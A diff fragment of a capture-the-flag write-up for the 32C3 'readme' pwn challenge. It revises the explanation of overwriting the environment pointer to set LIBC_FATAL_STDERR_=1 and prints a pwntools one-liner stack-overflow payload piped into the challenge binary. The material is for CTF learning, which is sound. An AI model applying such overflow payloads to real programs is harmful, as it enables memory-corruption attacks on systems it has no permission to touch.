73696e65/ctf-notes/2016-32c3/pwn-200-readme.md

 Aborted
 ```

-Because we are working with socket / pipe, we overwrite also the `env` address with our pointer.
-Note that this code does not work in gdb, because `\x00` terminates strings, so better approach would be to debug only using core dumps. `0x600d20` is the address of the second buffer, which is used when asking to overwrite the flag.
+Because we are working with socket / pipe, we overwrite also the `env` address with our pointer, to have defined `LIBC_FATAL_STDERR_=1`.

+Note that this code does not work in gdb, because `\x00` terminates strings, so better approach would be to debug only using core dumps. `0x600d20` is the address of the second buffer, which is used as storage, when the application is asking to overwrite the flag in second question.

 ```
 $ python -c 'from pwn import *; print "A" * 536 + p64(0x400d20) + p64(0) + p64(0x600d20) + "\n" + "LIBC_FATAL_STDERR_=1\n" ' | ./readme.bin